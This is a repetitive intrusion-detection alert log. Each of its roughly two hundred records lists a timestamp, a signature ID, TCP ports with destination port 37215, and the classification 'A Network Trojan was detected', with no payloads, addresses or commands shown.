                  Timestamp:07/10/24-08:26:25.443294
                  SID:2835222
                  Source Port:33612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2835222
                  Source Port:34028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.368400
                  SID:2835222
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.240759
                  SID:2829579
                  Source Port:34226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.177763
                  SID:2829579
                  Source Port:37200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.928939
                  SID:2835222
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2829579
                  Source Port:53872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.045134
                  SID:2835222
                  Source Port:50280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2829579
                  Source Port:33352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861772
                  SID:2829579
                  Source Port:48870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859325
                  SID:2829579
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487649
                  SID:2829579
                  Source Port:52360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2835222
                  Source Port:42098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534289
                  SID:2829579
                  Source Port:37090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.574403
                  SID:2829579
                  Source Port:45816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481124
                  SID:2835222
                  Source Port:44814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2829579
                  Source Port:42520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2835222
                  Source Port:46796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.633265
                  SID:2835222
                  Source Port:40620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533467
                  SID:2835222
                  Source Port:49746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2829579
                  Source Port:60088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637421
                  SID:2835222
                  Source Port:35400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2829579
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093817
                  SID:2829579
                  Source Port:36194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367813
                  SID:2835222
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835368
                  SID:2829579
                  Source Port:40706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175065
                  SID:2835222
                  Source Port:46780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2835222
                  Source Port:46058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.651918
                  SID:2835222
                  Source Port:50528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:47236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2829579
                  Source Port:50702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2829579
                  Source Port:44758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2829579
                  Source Port:56774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:51296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.442738
                  SID:2829579
                  Source Port:59430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2829579
                  Source Port:34774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2829579
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2835222
                  Source Port:43120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968110
                  SID:2829579
                  Source Port:34550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.849531
                  SID:2829579
                  Source Port:38608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865748
                  SID:2829579
                  Source Port:38972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2835222
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899646
                  SID:2829579
                  Source Port:33292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2829579
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2835222
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.819008
                  SID:2835222
                  Source Port:49250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2835222
                  Source Port:51876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253246
                  SID:2835222
                  Source Port:44490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
                  SID:2835222
                  Source Port:39666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.688835
                  SID:2835222
                  Source Port:39444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2829579
                  Source Port:48006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2829579
                  Source Port:58800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669115
                  SID:2829579
                  Source Port:56804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.666761
                  SID:2835222
                  Source Port:55732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.117247
                  SID:2835222
                  Source Port:38436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.832527
                  SID:2835222
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2829579
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2835222
                  Source Port:54342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569924
                  SID:2835222
                  Source Port:42490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072546
                  SID:2829579
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449751
                  SID:2829579
                  Source Port:33120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757034
                  SID:2835222
                  Source Port:41212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2829579
                  Source Port:54802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2829579
                  Source Port:59406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2835222
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.889193
                  SID:2835222
                  Source Port:34190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2829579
                  Source Port:51688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782000
                  SID:2835222
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334471
                  SID:2829579
                  Source Port:34484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012279
                  SID:2829579
                  Source Port:59986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844919
                  SID:2829579
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2829579
                  Source Port:37252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.158324
                  SID:2829579
                  Source Port:35888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2835222
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.767416
                  SID:2829579
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285425
                  SID:2829579
                  Source Port:34070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207710
                  SID:2835222
                  Source Port:34830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.148299
                  SID:2835222
                  Source Port:54302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645443
                  SID:2835222
                  Source Port:55980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.965064
                  SID:2829579
                  Source Port:50234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2835222
                  Source Port:49354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.841961
                  SID:2829579
                  Source Port:59614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2835222
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.194125
                  SID:2829579
                  Source Port:35662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430084
                  SID:2835222
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.815601
                  SID:2829579
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093189
                  SID:2835222
                  Source Port:51094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2829579
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2829579
                  Source Port:48334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2829579
                  Source Port:51108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236926
                  SID:2829579
                  Source Port:41422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593828
                  SID:2829579
                  Source Port:41984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2829579
                  Source Port:46876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.688567
                  SID:2829579
                  Source Port:59292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.091176
                  SID:2829579
                  Source Port:44102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2829579
                  Source Port:51486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850737
                  SID:2835222
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2835222
                  Source Port:41586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:30.989109
                  SID:2829579
                  Source Port:47824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.821944
                  SID:2835222
                  Source Port:54386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2835222
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781419
                  SID:2835222
                  Source Port:51440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2835222
                  Source Port:43724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.551619
                  SID:2829579
                  Source Port:45626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811363
                  SID:2829579
                  Source Port:56808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2835222
                  Source Port:45688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588620
                  SID:2835222
                  Source Port:48260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.054333
                  SID:2829579
                  Source Port:40534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2835222
                  Source Port:44266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897837
                  SID:2835222
                  Source Port:56560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875137
                  SID:2835222
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.815817
                  SID:2829579
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923335
                  SID:2835222
                  Source Port:48272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2829579
                  Source Port:37822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2829579
                  Source Port:32842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.447281
                  SID:2829579
                  Source Port:41084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2829579
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.325101
                  SID:2829579
                  Source Port:46428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2835222
                  Source Port:47690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872664
                  SID:2829579
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2829579
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934350
                  SID:2835222
                  Source Port:48812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367348
                  SID:2829579
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.393293
                  SID:2835222
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983078
                  SID:2829579
                  Source Port:43126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192031
                  SID:2835222
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857998
                  SID:2829579
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2835222
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2829579
                  Source Port:38988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484487
                  SID:2835222
                  Source Port:44460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2835222
                  Source Port:58088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.960420
                  SID:2835222
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129960
                  SID:2829579
                  Source Port:50658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2835222
                  Source Port:33068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2835222
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.763927
                  SID:2829579
                  Source Port:54796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.865375
                  SID:2829579
                  Source Port:47370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527827
                  SID:2835222
                  Source Port:49946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644790
                  SID:2829579
                  Source Port:42506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771167
                  SID:2835222
                  Source Port:54694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.970801
                  SID:2835222
                  Source Port:51584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2835222
                  Source Port:46496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532371
                  SID:2835222
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.503829
                  SID:2835222
                  Source Port:40974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2835222
                  Source Port:48892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.619172
                  SID:2835222
                  Source Port:33758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.722263
                  SID:2829579
                  Source Port:43968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812422
                  SID:2829579
                  Source Port:35322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609301
                  SID:2829579
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2835222
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044881
                  SID:2835222
                  Source Port:51714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990229
                  SID:2835222
                  Source Port:55788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603231
                  SID:2835222
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.636567
                  SID:2835222
                  Source Port:54452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2829579
                  Source Port:44012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459997
                  SID:2835222
                  Source Port:35760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.074173
                  SID:2829579
                  Source Port:46796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.703556
                  SID:2829579
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.951146
                  SID:2835222
                  Source Port:40864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879798
                  SID:2835222
                  Source Port:40580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2835222
                  Source Port:34296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.994856
                  SID:2829579
                  Source Port:36274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2835222
                  Source Port:43600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.562585
                  SID:2835222
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652000
                  SID:2829579
                  Source Port:58514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973462
                  SID:2835222
                  Source Port:33356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.931783
                  SID:2829579
                  Source Port:56106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2835222
                  Source Port:60568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.841867
                  SID:2829579
                  Source Port:33816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2829579
                  Source Port:50346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.132803
                  SID:2829579
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.184218
                  SID:2829579
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2835222
                  Source Port:57140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.907657
                  SID:2835222
                  Source Port:55098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.545437
                  SID:2829579
                  Source Port:35380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2835222
                  Source Port:56348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.827128
                  SID:2835222
                  Source Port:33388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270061
                  SID:2829579
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551943
                  SID:2829579
                  Source Port:41252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2835222
                  Source Port:50122
                  Destination Port:37215
                  Protocol:TCP
